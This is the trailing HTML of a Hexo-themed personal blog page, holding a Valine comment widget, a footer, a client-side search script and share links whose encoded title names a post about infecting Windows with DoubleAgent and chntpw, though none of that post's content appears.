    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




 
  <script src="//github.elemecdn.com/leancloud-storage@3/dist/av-min.js"></script>
  <script src='//github.elemecdn.com/valine@1.5.1/dist/Valine.min.js'></script>

  <div id="vcomments"></div>

  <script>
    new Valine({
      el: '#vcomments',
      appId: 'bkevnbohTLs8IMTtlPQAE46E-gzGzoHsz',
      appKey: 'WRvdsNxM9t5XI41zg0QrBmmX',
      placeholder: '留个言吧~',
      avatar: 'retro',
      lang: 'zh'
    })
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/bairePage/bairePage.github.io">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="Email" href="/about/">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="WeChat" href="/about/">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/bairePage/bairePage.github.io">Copyright © DiamondHunters 2023</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E4%BD%BF%E7%94%A8DoubleAgent%E4%B8%8Echntpw%E6%84%9F%E6%9F%93%E7%9B%98%E5%86%85windows%E7%B3%BB%E7%BB%9F + '&url=' + https%3A%2F%2Fbai.re%2F2023%2F07%2F17%2Finfecting-windows-with-doubleAgent-and-chntpw%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://bai.re/2023/07/17/infecting-windows-with-doubleAgent-and-chntpw/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
